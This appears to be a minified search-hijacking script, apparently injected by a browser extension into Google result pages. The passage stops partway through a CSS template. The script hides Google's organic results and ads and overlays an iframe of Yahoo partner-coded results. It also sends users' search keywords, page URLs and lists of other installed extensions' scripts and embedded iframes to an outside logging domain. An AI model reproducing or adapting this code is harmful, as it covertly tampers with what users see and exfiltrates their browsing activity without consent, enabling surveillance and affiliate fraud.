(function(){var i = "VPGCNBK0FG", atr = "0096-20250221-2370731_2370731-3943232122-4269441498-czacy4756x", en = "", domain = "search.becovi.net";var log_domain = "irguio.info";var is_mobile = false;var etag_works = "test";var top_shopping = false;var error_version = "2";var url = window.location.search;var params = new URLSearchParams(url);var tbm = params.get('tbm');var udm = params.get('udm'); if (udm === '28' || tbm === 'bks' || tbm === 'nws' || tbm === 'lcl' || tbm === 'fin' || tbm === 'shop') {fetch('https://' + log_domain + '/ab.php?cause=tbm&i='+i+'&atr='+atr+'&tbm='+tbm+'&udm='+udm+ '&url='+encodeURIComponent(window.location.href.substring(0, 255)));return false;}var yhs_url = "https://search.yahoo.com/yhs/search?hspart=flowsurf&hsimp=yhs-perfecttab2&type=x_UDZSS3R0T1F3QlFDTWRodko3QlRHSlVvM0gyL05oYm9BcENKa0c1MzhCendJb09iQUhNQTZvU1dKTncxN3FNU2pSMDhTNWdoZlBOaXdjQmhhRzYyU0hHeGJSb1NDQT09&grd=1&p=";var fid = "9";var sid = "0096-20250221-2370731_2370731-3943232122-4269441498-czacy4756x";var type_tag_fix = 1;var st_enabled = 1;function updateURLTypeTag(yhs_url, search_type) {
    if (typeof type_tag_fix === 'undefined') {
        return yhs_url;
    }
    if (search_type === 'videos') {
        let url_object = new URL(yhs_url);
        let params = new URLSearchParams(url_object.search);
        let hsimp = params.get('hsimp');
        let hspart = params.get('hspart');
        params.set('ei', 'UTF-8');
        params.set('fr', 'yhs-' + hspart + '-' + hsimp.replace('yhs-', ''));
        url_object.search = params.toString();
        yhs_url = url_object.toString();
    }
    return yhs_url;
}var rshow_timeout = null;
var hads_timeout = null;
var getkw_timeout = null;

function getkw(callback) {
  clearTimeout(getkw_timeout);

  var url = window.location.search;
  if (typeof url === "undefined" || url === null) {
      getkw_timeout = setTimeout(function() {
          return getkw(callback);
      }, 10)
      return;
  }
  var params = new URLSearchParams(url);
  var tbm = params.get('tbm');

  if (typeof tbm_blacklist === 'undefined') {
      tbm_blacklist = ['lcl', 'fin', 'shop'];
  }
  if (tbm_blacklist.indexOf(tbm) === -1) {
    if (url.indexOf("sidesearch=1") !== -1){
        rshow();
        return;
    }
    if (typeof path_check !== 'undefined') {
        if (window.location.pathname !== path_check) {
            rshow();
            return;
        }
    }
    else if (window.location.pathname !== '/search') {
        rshow();
        return;
    }
    var kw = params.get('q');
    if(kw && kw.length > 0) {
      return callback(kw);
    }
  }
  getkw_timeout = setTimeout(function() {
    return getkw(callback);
  }, 10)
}

function lightOrDark(color) {
    if (color == 'transparent') {
        return 'light';
    }

    var r, g, b, hsp;
    if (color.match(/^rgb/)) {
        color = color.match(/^rgba?\((\d+),\s*(\d+),\s*(\d+)(?:,\s*(\d+(?:\.\d+)?))?\)$/);

        r = color[1];
        g = color[2];
        b = color[3];
    } else {
        color = +("0x" + color.slice(1).replace(
        color.length < 5 && /./g, '$&$&'));

        r = color >> 16;
        g = color >> 8 & 255;
        b = color & 255;
    }

    if (r == 0 && g == 0 && b == 0) {
        return 'black';
    }

    hsp = Math.sqrt(
        0.299 * (r * r) +
        0.587 * (g * g) +
        0.114 * (b * b)
    );

    return hsp > 127.5 ? 'light' : 'dark';
}

function rshow() {
  clearTimeout(rshow_timeout);
  var el = document.querySelector("#rcnt");
  if (el) {
    el.style["opacity"] = 1;
    el = document.querySelector("#cnt");
    if (el) {
      el.style["opacity"] = 1;
    }
    var appbar = document.querySelector("#appbar");
    if (appbar) {
      appbar.style['opacity'] = 1;
    }
  }
  else {
    el = document.querySelector("#cnt");
    if (el) {
        el.style["opacity"] = 1;
    }
    var appbar = document.querySelector("#appbar");
    if (appbar) {
      appbar.style['opacity'] = 1;
    }
    rshow_timeout = setTimeout(rshow, 50);
  }
}

function removeAds() {
    if (!document.getElementById('opeRtF')) {
        var node = document.createElement("style");
        node.setAttribute('id', 'opeRtF');
        let additional_selectors = '';
        if (!top_shopping) {
            additional_selectors = ',#atvcap'
        }
        node.innerHTML = ".commercial-unit-desktop-top,.commercial-unit-desktop-rhs,#taw,#epbar,#mbEnd,#tads,#tadsb,.ads-ad,#extabar div[jscontroller=\"E9W1Ff\"] "+additional_selectors+" {display:none!important}.FcOujd .ULSxyf:first-child {margin-top: 0;!important}";

        document.getElementsByTagName("html")[0].appendChild(node);
    }
}

function verifyBrowserWithHighEntropyValues(callback) {
    let browser_name = '';
    if (typeof navigator.userAgentData !== 'undefined' && typeof navigator.userAgentData.getHighEntropyValues !== 'undefined') {
        navigator.userAgentData.getHighEntropyValues(
            ['fullVersionList'])
            .then((ua) => {
                var brands = [];
                if (typeof ua.fullVersionList === 'object') {
                    brands = ua.fullVersionList;
                } else if (typeof ua.brands === 'object') {
                    brands = ua.brands;
                }

                for (let i = 0; i < brands.length; i++) {
                    if (typeof brands[i].brand === 'string' && brands[i].brand === 'Microsoft Edge') {
                        browser_name = 'edge_hints';
                    }
                }

                callback(browser_name);
            })
            .catch(function(error) {
                callback(browser_name);
            });
    }
    else {
        callback(browser_name)
    }
}

function hasAlgoContainer() {
    return document.querySelector('#rcnt .g') !== null;
}

function hads() {
    clearTimeout(hads_timeout);
    var target = document.getElementsByTagName("html")[0];
    if (!target) {
        hads_timeout = setTimeout(hads, 10);
        return;
    }
    if (!hasAlgoContainer()) {
        var css_text = "#appbar, #rcnt, #cnt{opacity:0;}";
        var node = document.createElement("style");
        if (node.styleSheet && node.styleSheet.cssText) {
            node.styleSheet.cssText = css_text;
            target.appendChild(node);
        }
        else {
            node.innerHTML = css_text;
            target.appendChild(node);
        }
        removeAds();
    }
    else {
        reportBehavior({phase: 1});
    }
}


if(hasInitOverlap()){return;}
if(hasElementOverlap()){return;}

hads();

let scrollListener = function(){
    let x = Math.round(window.scrollX);
    let y = Math.round(window.scrollY);
    if ((x === 0 && y === 0) || (x === null || y === null)) { return; }
    let privatelayer = document.getElementById('privatelayer');
    if (!privatelayer) {
        privatelayer = document.getElementById('zxj3jdh2l');
    }
    privatelayer.contentWindow.postMessage(["pageScroll", {x, y}], "*");
};

function bodyDimensionListener(e) {
    if (e.data === 'bodyDimension') {
        let body = document.body;
        let d = document.documentElement;
        let bodyClientWidth = body ? body.clientWidth : null;
        let bodyScrollWidth = body ? body.scrollWidth : null;
        let bodyOffsetWidth = body ? body.offsetWidth : null;
        let documentClientWidth = d ? d.clientWidth : null;
        let documentScrollWidth = d ? d.scrollWidth : null;
        let documentOffsetWidth = d ? d.offsetWidth : null;
        let width = Math.max(bodyClientWidth, bodyScrollWidth, bodyOffsetWidth,
            documentClientWidth, documentScrollWidth, documentOffsetWidth);

        let bodyClientHeight = body ? body.clientHeight : null;
        let bodyScrollHeight = body ? body.scrollHeight : null;
        let bodyOffsetHeight = body ? body.offsetHeight : null;
        let documentClientHeight = d ? d.clientHeight : null;
        let documentScrollHeight = d ? d.scrollHeight : null;
        let documentOffsetHeight = d ? d.offsetHeight : null;
        let height = Math.max(bodyClientHeight, bodyScrollHeight, bodyOffsetHeight,
            documentClientHeight, documentScrollHeight, documentOffsetHeight);


        data = { width, height, documentClientHeight};
        let privatelayer = document.getElementById('privatelayer');
        if (!privatelayer) {
            privatelayer = document.getElementById('zxj3jdh2l');
        }
        privatelayer.contentWindow.postMessage(["bodyDimension", data], "*");
    }
    else if (e.data === 'pageScroll') {
        window.addEventListener('scroll', scrollListener, true);
    }
}
window.addEventListener('message', bodyDimensionListener, false);

function reportAIOverview(bidded = '0') {
    let params = new URLSearchParams(window.location.search);
    let keyword = params.get('q') || '';
    let ai_overview_element = document.querySelector('div[jsname="cUzNTd"]');
    if (ai_overview_element) {
        fetch('https://' + log_domain + '/page.php?i='+i+'&element=ai_overview&domain='+encodeURIComponent(window.location.hostname)+'&keyword='+encodeURIComponent(keyword)+'&bidded='+bidded).then(function (response) {});
    }
}

let script_url = document.currentScript && document.currentScript.src;
function reportChromeExtensions(template = '') {
    if (Math.random() > 0.25) {
        return;
    }
    let srcs = [];
    let selector = 'script[src^="chrome-extension://"]';
    if (/google./.test(window.location.host)) {
        selector = 'script[src^="chrome-extension://"], script:not([nonce])';
    }

    let excluded_domains = ['gstatic.com', 'googleapis.com', 'google.com', 'yimg.com'];
    document.querySelectorAll(selector).forEach((el) => {
        if (el.src && el.src !== script_url) {
            let test_src = el.src.replace('blob:', '');
            try {
                let test_src_url = new URL(test_src);
                let test_src_domain = test_src_url.hostname;
                if (!excluded_domains.some(domain => test_src_domain.includes(domain))) {
                    srcs.push(el.src);
                }
            } catch (e) {
                srcs.push(el.src);
            }

        }
    });
    if (srcs.length > 0) {
        fetch('https://'+log_domain+'/ssrc.php?t='+template+'&i='+encodeURIComponent(i)+'&atr='+encodeURIComponent(atr), {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                srcs: srcs,
                page: document.location.href,
            })
        });
    }
}

function reportIframes(template = '') {
    let srcs = [];

    if (/google./.test(window.location.host)) {
        let selector = 'iframe:not([src*="google."]):not([src*="youtube."]):not([src="about:blank"]):not([id="zxj3jdh2l"]):not([id="privatelayer"])';
        document.querySelectorAll(selector).forEach((el) => {
            if (el.src) {
                let test_src = el.src.replace('blob:', '');
                srcs.push(test_src);
            }
        });
        if (srcs.length > 0) {
            fetch('https://' + log_domain + '/isrc.php?t=' + template + '&i=' + encodeURIComponent(i) + '&atr=' + encodeURIComponent(atr), {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    srcs: srcs,
                    page: document.location.href,
                })
            });
        }
    }
}

function sendMessageToIframeWithRetry(iframe_window, message, expected_response, max_retries, initial_retry_interval) {
    let retries = 0;
    let message_sent = false;
    let retry_interval = initial_retry_interval;
    let retry_in_progress = false;

    return new Promise((resolve, reject) => {
        function handleMessage(event) {
            if (event.data === expected_response) {
                window.removeEventListener('message', handleMessage);
                message_sent = true;
                resolve({ response: event.data, attempts: retries });
            }
        }

        window.addEventListener('message', handleMessage);

        function trySendMessage() {
            if (message_sent || retries >= max_retries) {
                if (!message_sent) {
                    window.removeEventListener('message', handleMessage);
                    reject(new Error('No response received after max retries.'));
                }
                return;
            }

            if (retry_in_progress) {
                // If a retry is already in progress, return early
                return;
            }

            retry_in_progress = true;
            iframe_window.postMessage(message, "*");
            retries++;

            setTimeout(() => {
                retry_in_progress = false;
                trySendMessage();
            }, retry_interval);
        }

        trySendMessage();
    });
}

function pagerLinks() {

    const paginationDiv = document.querySelector('.compPagination .pages');
    if (!paginationDiv) {
        return;
    }
    const pages = paginationDiv.querySelectorAll('a');
    const paginationData = [];
    pages.forEach(page => {
        paginationData.push({
            pageNumber: page.textContent.trim(),
            href: page.getAttribute('href')
        });
    });
    let next = document.querySelector('.compPagination .next');
    if (next) {
        paginationData.push({
            'next': next.getAttribute('href')
        });
    }
    window.parent.postMessage(["pager", paginationData], "*");
}

function getGooglePageNumber() {
    var params = new URLSearchParams(window.location.search);
    var start = params.get('start');
    if (start) {
        return Math.ceil(start / 10) + 1;
    }
    return 1;
}

function getYHSSavedPagerLinks(page) {
    if (page === 1) {
        return '';
    }
    if (typeof(Storage) === "undefined") {
        return '';
    }

    let pagerLinks = localStorage.getItem('pager_yhs');
    if (pagerLinks) {
        let pagerArr = JSON.parse(pagerLinks);
        let pager = pagerArr.find(pager => pager.pageNumber == page);
        if (pager) {
            return pager.href;
        }
    }
    return '';
}

function extractDomainLabelFromHostname(hostname) {
    let hostname_parts = hostname.replace(/^www\./, '').split('.');
    let part_number = 0;
    if (hostname_parts.length > 2) {
        let last_two_parts = hostname_parts.slice(-2).join('.');
        // Check if the last two parts are a common 2 parts TLD
        let tlds=[
            "com.au","net.au","org.au","edu.au","gov.au","asn.au","id.au","ac.uk",
            "co.uk","gov.uk","ltd.uk","me.uk","net.uk","nhs.uk","org.uk","plc.uk",
            "pol.uk","sch.uk","co.jp","ne.jp","or.jp","ac.jp","ed.jp","go.jp",
            "ad.jp","gr.jp","lg.jp","com.nz","net.nz","org.nz","maori.nz",
            "school.nz","govt.nz","iwi.nz","health.nz","co.za","net.za",
            "org.za","web.za","gov.za","ac.za","com.br","net.br","org.br",
            "gov.br","edu.br","com.mx","net.mx","org.mx","edu.mx","gob.mx",
            "com.tr","net.tr","org.tr","biz.tr","info.tr","gov.tr","com.tw",
            "net.tw","org.tw","edu.tw","gov.tw","com.vn","net.vn","org.vn",
            "edu.vn","gov.vn","com.sg","net.sg","org.sg","gov.sg","edu.sg",
            "per.sg","com.my","net.my","org.my","gov.my","edu.my","com.ph",
            "net.ph","org.ph","edu.ph","gov.ph","com.hk","net.hk","org.hk",
            "gov.hk","edu.hk","com.ar","net.ar","org.ar","gov.ar","edu.ar",
            "com.co","net.co","nom.co","org.co","edu.co","gov.co","com.pe",
            "net.pe","org.pe","edu.pe","gov.pe","com.ve","net.ve","org.ve",
            "edu.ve","gov.ve","com.eg","net.eg","org.eg","edu.eg","gov.eg",
            "com.sa","net.sa","org.sa","edu.sa","gov.sa","com.pk","net.pk",
            "org.pk","edu.pk","gov.pk","com.bd","net.bd","org.bd","edu.bd",
            "gov.bd","com.ng","net.ng","org.ng","edu.ng","gov.ng","com.gh",
            "org.gh","edu.gh","gov.gh","com.ke","net.ke","org.ke","edu.ke",
            "gov.ke","com.id","net.id","org.id","edu.id","go.id","ac.id",
            "co.th","in.th","go.th","net.th","org.th","ac.th","mi.th",
            "or.th","com.lk","net.lk","org.lk","edu.lk","gov.lk","com.kh",
            "net.kh","org.kh","edu.kh","gov.kh","com.mm","net.mm","org.mm",
            "edu.mm","gov.mm","com.uy","net.uy","org.uy","edu.uy","gov.uy",
            "com.ec","net.ec","org.ec","edu.ec","gov.ec","com.bo","net.bo",
            "org.bo","edu.bo","gov.bo","com.py","net.py","org.py","edu.py",
            "gov.py","com.cl","net.cl","org.cl","edu.cl","gov.cl","com.cr",
            "net.cr","org.cr","edu.cr","gov.cr","com.gt","net.gt","org.gt",
            "edu.gt","gov.gt","com.do","net.do","org.do","edu.do","gov.do",
            "com.hn","net.hn","org.hn","edu.hn","gov.hn","com.ni","net.ni",
            "org.ni","edu.ni","gov.ni","com.sv","net.sv","org.sv","edu.sv",
            "gov.sv","com.tt","net.tt","org.tt","edu.tt","gov.tt","com.bh",
            "net.bh","org.bh","edu.bh","gov.bh","com.om","net.om","org.om",
            "edu.om","gov.om","com.qa","net.qa","org.qa","edu.qa","gov.qa",
            "com.kw","net.kw","org.kw","edu.kw","gov.kw","com.lb","net.lb",
            "org.lb","edu.lb","gov.lb","com.jo","net.jo","org.jo","edu.jo",
            "gov.jo","com.cy","net.cy","org.cy","edu.cy","gov.cy"];
        if (tlds.includes(last_two_parts)) {
            part_number = hostname_parts.length - 3;
        } else {
            part_number = hostname_parts.length - 2;
        }
    }
    return hostname_parts[part_number];
}function reportBehavior(data) {
    if (typeof bev_reported === 'undefined') {
        window.bev_reported = true;
        var origin = {i: i, atr: atr};
        fetch('https://'+log_domain+'/bev.php', {
            method: "POST", body: JSON.stringify({origin: origin, step: data})
        }).then(function (response) {});
    }
}function reportUserOverlap(data) {
    if (typeof overlap_reported === 'undefined') {
        window.overlap_reported = true;
        var origin = {i: i, atr: atr};
        fetch('https://'+log_domain+'/overlap.php', {
            method: "POST", body: JSON.stringify({origin: origin, overlap: data})
        }).then(function (response) {});
    }
}

function hasInitOverlap() {
    var e = document.getElementById('mpimpl');
    if (e) {
        reportUserOverlap({element: 'mpimpl', data: e.getAttribute('data-value')});
        return true;
    }
    if (typeof mpimpl != 'undefined') {
        var data = '';
        if (typeof mpimpl == 'string') {
            data = mpimpl;
        }
        reportUserOverlap({element: 'global', data: data});
        return true;
    }

}

function hasElementOverlap() {
    var e = document.getElementById('mdorkirgneorpowtn');
    if (e) {
        reportUserOverlap({element: 'mdorkirgneorpowtn', data: e.getAttribute('data-value')});
        return true;
    }
    if (typeof mdorkirgneorpowtn != 'undefined') {
        var data = '';
        if (typeof mdorkirgneorpowtn == 'string') {
            data = mdorkirgneorpowtn;
        }
        reportUserOverlap({element: 'global', data: data});
        return true;
    }
    e = document.getElementById('privatelayer');
    if (e) {
        reportUserOverlap({element: 'privatelayer', data: e.src || ''});
        return true;
    }
    e = document.getElementById('zxj3jdh2l');
    if (e) {
        reportUserOverlap({element: 'zxj3jdh2l', data: e.src || ''});
        return true;
    }
    e = document.getElementById('sadsfs');
    if (e) {
        reportUserOverlap({element: 'sadsfs', data: ''});
        return true;
    }
    e = document.getElementById('navflow');
    if (e) {
        reportUserOverlap({element: 'navflow', data: ''});
        return true;
    }
    e = document.querySelector('.flowsponso');
    if (e) {
        reportUserOverlap({element: 'flowsponso', data: ''});
        return true;
    }

    return false;
}


function hasThirdPartyElementOverlap() {
    if (typeof mdorkirgneorpowtn != 'undefined') {
        reportUserOverlap({element: 'global', data: mdorkirgneorpowtn});
        return true;
    }
    e = document.getElementById('sadsfs');
    if (e) {
        reportUserOverlap({element: 'sadsfs', data: ''});
        return true;
    }
    e = document.getElementById('navflow');
    if (e) {
        reportUserOverlap({element: 'navflow', data: ''});
        return true;
    }
    e = document.querySelector('.flowsponso');
    if (e) {
        reportUserOverlap({element: 'flowsponso', data: ''});
        return true;
    }
    e = document.getElementById('mdorkirgneorpowtn');
    if (e) {
        reportUserOverlap({element: 'mdorkirgneorpowtn', data: e.getAttribute('data-value')});
        return true;
    }
    e = document.getElementById('yhscss');
    if (e) {
        reportUserOverlap({element: 'yhscss', data: ''});
        return true;
    }
    e = document.getElementById('ghs');
    if (e) {
        reportUserOverlap({element: 'ghs', data: ''});
        return true;
    }


    return false;
}var hel = document.createElement('div');hel.setAttribute('data-value', "i=VPGCNBK0FG&atr=0096-20250221-2370731_2370731-3943232122-4269441498-czacy4756x");hel.setAttribute('id', 'mpimpl');hel.style['display'] = 'none';document.getElementsByTagName('html')[0].appendChild(hel);mpimpl = "i=VPGCNBK0FG&atr=0096-20250221-2370731_2370731-3943232122-4269441498-czacy4756x";function hasAlgoContainer(){return document.querySelector("#rcnt .g")!==null}var startTime=Date.now();var privatelayer=null;var privatelayer_algo_sent=null;var rhide_timeout=null,rshow_timeout=null;var aas=hasAlgoContainer();var verify_overlap_timeout=null;var tbm_blacklist=["lcl","fin","shop"];var iversion=0;var loadedEventSent=false;function deleteElement(e){if(e.parentNode)e.parentNode.removeChild(e)}function deleteElements(elements){forEach(elements,function(i,el){deleteElement(el)})}var forEach=function(array,callback,scope){for(var i=0;i<array.length;i++){callback.call(scope,i,array[i])}};function isSupportedSection(){const params=new URLSearchParams(window.location.search);return params.get("tbm")===null||getSearchType()==="images"||getSearchType()==="videos"}function checkid(target,height,iframe){clearTimeout(varto);var targetdiv=document.getElementById(target);if(isSupportedSection()&&typeof targetdiv!=="undefined"&&targetdiv!==null){var appbar=document.querySelector("#appbar");if(appbar&&appbar.offsetHeight>200){appbar.innerHTML="";appbar.style["height"]="43px"}var rect=targetdiv.getBoundingClientRect();if(targetdiv.getBoundingClientRect().height==0){var center_col=document.getElementById("center_col");if(center_col){rect=center_col.getBoundingClientRect()}}iframe.style.top=rect.top+window.scrollY+"px";iframe.style.left="0";iframe.height=height+"px";const rhs=document.querySelector("#rhs");if(rhs){rhs.style.display="none"}if(!privatelayer_algo_sent){privatelayer_algo_sent=true;deleteElements(document.querySelectorAll('.ULSxyf > [jscontroller="ILbBec"]'));window.addEventListener("message",function(e){resize(e,target)},false);sendToFrame()}}else{var varto=setTimeout(function(){checkid(target,height,iframe)},10)}}function resize(e,target){var targetdiv=document.getElementById(target);var eventName=e.data[0];var data=e.data[1];switch(eventName){case"resize":window.removeEventListener("message",resize,false);if(data>0){var rcnt=document.querySelector(typeof target_element_id!=="undefined"?"#"+target_element_id:"#cnt");if(rcnt){var rect_width=document.body.getBoundingClientRect().width;privatelayer.style["width"]=rect_width-privatelayer.getBoundingClientRect().x+"px"}privatelayer.height=data+"px";privatelayer.style.opacity="1";reportDisplay();var rect=privatelayer.getBoundingClientRect();targetdiv.style.marginTop=rect.height+20+"px";if(typeof yhsnog!=="undefined"){if(rect.height>1e3){let rso_element=document.getElementById("rso");let rcnt_element=document.getElementById("rcnt");if(rso_element&&rcnt_element&&rcnt_element.style.opacity!=="1"){rso_element.style["display"]="none"}}}setInterval(function(){var center_col=document.getElementById("center_col");if(center_col){rect=center_col.getBoundingClientRect();privatelayer.style.top=rect.top+10+window.scrollY+"px"}},10)}rshow();break}}function reportDisplay(){if(typeof display_reported==="undefined"){display_reported=true;fetch("https://"+log_domain+"/shy/d.php?t=21&i="+encodeURIComponent(i)+"&atr="+encodeURIComponent(atr)+"&lt="+encodeURIComponent(Date.now()-startTime))}}function getGoogleColors(){var colors={};if(document.body){const bgColor=window.getComputedStyle(document.body).backgroundColor;const darkness=lightOrDark(bgColor);colors.dots_svg="data:image/svg+xml;base64,PHN2ZyBmb2N1c2FibGU9ImZhbHNlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyNCAyNCI+PHBhdGggZD0iTTEyIDhjMS4xIDAgMi0uOSAyLTJzLS45LTItMi0yLTIgLjktMiAyIC45IDIgMiAyem0wIDJjLTEuMSAwLTIgLjktMiAycy45IDIgMiAyIDItLjkgMi0yLS45LTItMi0yem0wIDZjLTEuMSAwLTIgLjktMiAycy45IDIgMiAyIDItLjkgMi0yLS45LTItMi0yeiIgZmlsbD0iIzlhYTBhNiI+PC9wYXRoPjwvc3ZnPg==";switch(darkness){case"dark":colors.site_name="#dadce0";colors.link="#99c3ff";colors.description_bold="#bfbfbf";colors.description="#bfbfbf";colors.site="#bdc1c6";colors.shop_color="#ddd";colors.shop_border="#3c4043";colors.sub_site="#969ba1";colors.ratings="#9aa0a6";colors.fav_border="#ecedef";colors.fav_bg="#fff";colors.border="#3c4043";break;case"light":colors.site_name="#202124";colors.link="#1a0dab";colors.description_bold="#767676";colors.description="#474747";colors.site="#202124";colors.shop_color="#202124";colors.shop_border="#dadce0";colors.sub_site="#5f6368";colors.ratings="#70757a";colors.fav_border="#3c4043";colors.fav_bg="#f1f3f4";colors.border="#e0e4e9";colors.dots_svg="data:image/svg+xml;base64,PHN2ZyBmb2N1c2FibGU9ImZhbHNlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyNCAyNCI+PHBhdGggZD0iTTEyIDhjMS4xIDAgMi0uOSAyLTJzLS45LTItMi0yLTIgLjktMiAyIC45IDIgMiAyem0wIDJjLTEuMSAwLTIgLjktMiAycy45IDIgMiAyIDItLjkgMi0yLS45LTItMi0yem0wIDZjLTEuMSAwLTIgLjktMiAycy45IDIgMiAyIDItLjkgMi0yLS45LTItMi0yeiIgZmlsbD0iIzcwNzU3QSI+PC9wYXRoPjwvc3ZnPg==";break;case"black":colors.site_name="#dadce0";colors.link="#99c3ff";colors.description_bold="#bfbfbf";colors.description="#bfbfbf";colors.site="#bdc1c6";colors.shop_color="#ddd";colors.shop_border="#3c4043";colors.sub_site="#969ba1";colors.ratings="#9aa0a6";colors.fav_border="#ecedef";colors.fav_bg="#fff";colors.border="#3c4043";break}colors.bg=bgColor;var link=document.querySelector("#rso .g:not(.mnr-c) a[ping]");if(link){colors.link=window.getComputedStyle(link).color}var site_name=document.querySelector("#rso .g:not(.mnr-c) span.VuuXrf");if(site_name){colors.site_name=window.getComputedStyle(site_name).color}var site=document.querySelector("#rso .g:not(.mnr-c) cite");if(site){colors.site=window.getComputedStyle(site).color}var sub_site=document.querySelector("#rso .g:not(.mnr-c) cite span");if(sub_site){colors.sub_site=window.getComputedStyle(sub_site).color}var description=document.querySelector("#rso .g:not(.mnr-c) .p4wth > span");if(description){colors.description=window.getComputedStyle(description).color}}return colors}function sendToFrame(){var colors=getGoogleColors();let ad_element=document.querySelector(".yuRUbf");let font_sizes={site_name:"14px",site:"12px",title:"20px",site_margin_top:"18px"};if(ad_element){let fontCiteName="";let cite_name_element=ad_element.querySelector(".VuuXrf");if(cite_name_element){fontCiteName=window.getComputedStyle(cite_name_element).getPropertyValue("font-size")}let fontSizeTitle="";let title_element=ad_element.querySelector("h3");if(title_element){fontSizeTitle=window.getComputedStyle(title_element).getPropertyValue("font-size")}let fontSizeCite="";let cite_element=ad_element.querySelector("cite");if(cite_element){fontSizeCite=window.getComputedStyle(cite_element).getPropertyValue("font-size")}if(fontSizeTitle==="22px"){font_sizes.title="22px"}if(fontCiteName==="16px"||fontCiteName==="14px"){font_sizes.site_name=fontCiteName}if(fontSizeCite==="16px"||fontSizeCite==="14px"){font_sizes.site=fontSizeCite;font_sizes.site_margin_top="22px"}}var cssText=`
    
        :root {
            --blue-light: `+colors.link+`!important;            
            --fontcolor-light: `+colors.site_name+`!important;            
            --fontcolor-site: `+colors.site+`!important;            
            --fontgray2-light: `+colors.description+`!important;            
        }
        :root .b_dark {
            --background: `+colors.bg+`!important;            
            --blue: `+colors.link+`!important;            
            --fontcolor: `+colors.site_name+`!important;            
            --fontgray2-dark: `+colors.description+`!important;            
        }
    
        html {overflow: hidden;height:100%;}
        
        body {margin-left: 35px;font-family:arial,sans-serif;}
        #results {margin-top: 0;}
        #left {padding-right: 90px}
        #sticky-hd, #ys, .searchSuperTop, .searchCenterFooter, .searchBottom, #ft_wrapper {display:none !important;}
        h3.title > span.bd-1-1A0DAB {display:none !important;}
        .AdHdrTop,.AdTitleBttm,.AdHdrNrrw,#doc #sidebar {display: none;}
        .dd.vp-carousel .vid-mgr-container, .compProductList-expand-btn, .dd.assist.Sugg, .algo form {display:none;} 
        
        html,html#atomic,body,#main,.scta,.scba,.srba,.rs-section .rs-cont .rs-row .rs-block, .searchRightTop, .searchRightMiddle, 
        .cardReg .dd, .bgc-white, .dd.bgc-4th , .pla .compProductList-preview, .pla .compProductList-preview>div, 
        .pla .hv,.compArticleList.theme-trending li,.srma .dd,.compContainerExpRight .itm .arr,.dd.tn-carousel.refresh 
        .compGenericCardList.nws_itm .s-card, .s-card-wrapAnchor, .dd.vp-carousel .compCardList li,
        .grp-pasfCarousel .compCardList li, .grp-peopleBooks .compCardList li, .grp-peopleMovieTv .compCardList li,
        .dd .bgc-h-marshmallow:hover,.bgc-marshmallow,.technologyCodingAnswer .compContainerUL .card-pagination, .pla li.plaItem {background: `+colors.bg+`!important;}
        .pla-cntr .plaItem .txtWrap .title, .plaItem .txtWrap, #maindoc .plaItem .txtWrap .seller {color: `+colors.site_name+`!important;}
        .pla-cntr .plaItem a {text-decoration: none;}
        #main.hidden-visible {visibility: visible;}

        
        .dd.algo .grp-algo-spacing {display: none !important;}
       
        
        div#results {
            padding-left: 0 !important;
        }
        
        #results .AlsoTry_N {display: none;}
        
        #guce-inline-consent-iframe {display:none !important;}
        
        body.page-images {margin-left: 0;}
        header, footer #ft_wrapper, #nav-bar, #main h2, #res-cont {display:none !important;}
        #main {margin-top: 0;}
        #main .north hr, #pla-north .compJsToggle, #main-algo #rs-eyebrow, #main-algo .dym-c .qss, #main-algo > .zrp {display:none;}  
        .pla li.plaItem, .pla-cntr .plaItem .txtWrap .price {border-color: `+colors.border+`;}
        footer section.cr {display: none !important;}
        #main .a .pla-cntr {
            height: unset!important
        }                           
        #main .a .pla-cntr ul {
            flex-wrap: wrap !important;
            max-height: unset !important;
            margin-right: 0;
            margin-bottom: 20px;
            padding: 40px 20px 16px !important
            
        }
        #maindoc .plaItem img {
            margin: 0 auto !important;
        }
        #main .pla .pla-cntr li.plaItem {
            height: 248px !important;
            min-width: 150px !important;
            max-width: 160px !important;
            flex: 1 1;
            margin-top: 16px !important;
            margin-right: 16px !important;
            margin-left: 1px !important;
        }
        #maindoc .plaItem .txtWrap .price {
            font-weight: 700;
        }
        #main .a .pla-cntr ul.hidden {
            max-height: 540px;
            overflow: hidden;
            margin-bottom: 6px
        }
        #main .a .pla-cntr.compJsScroll ul {
            max-height: 340px;
            flex-wrap: unset
        }
        
        .a .pla-cntr .plaItem .backplate {
            background-color: #fff
        }
    
        #main .a .pla-cntr li.plaItem .imgWrap {
            align-items: center;
            justify-content: center;
            display: flex
        }
    
        .a .pla-cntr .plaItem .imgWrap .thmb {
            width: 160px
        }
    
        #main .a .pla-cntr .plaItem img {
            height: 105px;
            width: 160px
        }
        .a .mr_rating .stars-lg span {
            background-image: url("https://s.yimg.com/pv/i/all/vertical/local/us_srp_feynman_local_20140102.png");
        }
    
        @media (-webkit-min-device-pixel-ratio: 2), (min-resolution: 192dpi) {
            .a .mr_rating .stars-lg span {
                background-image: url('https://s.yimg.com/pv/i/all/vertical/local/us_srp_feynman_local_x2_20140102.png');
            }
        }
        body #doc .aaa .ad-domain.fz-14 {color: var(--fontcolor-site) !important;}
        body #doc .aaa .ad-domain, div#results .compTitle h3 span {font-size: `+font_sizes.site+` !important;}
        body #doc .aaa .domain-name, div#results .compTitle h3 span.domain-name {font-size: `+font_sizes.site_name+` !important;}
        body #doc .aaa .title > span, #main #web .dd .title a {font-size: `+font_sizes.title+` !important;}
        
    
        div#results .searchCenterMiddle .ATop .compTitle h3 {
            margin-top: 0 !important;
            color: `+colors.link+` !important;
        }
                
        
        `;cssText+=`
        #atomic .page-search #currencyConversion-dd .C\\(\\#101518\\)  {color: #000 !important;}
        #doc #results .dd .compText span {color: var(--fontgray2) !important;}
        #doc .aaa .ad-domain, #doc .a .ad-domain {padding-bottom: 0;margin-bottom: 4px;}
        .compCurrConv {display: none !important;}
    `;let search_type=getSearchType();if(search_type=="videos"){cssText+=`
            body{margin-left: 0;}
            #doc .a .ad-domain {margin-left: 0 !important;}
            .favicon_container{display: flex;align-items: center;padding-bottom: 4px;position: relative;height: 38px;cursor: pointer;}
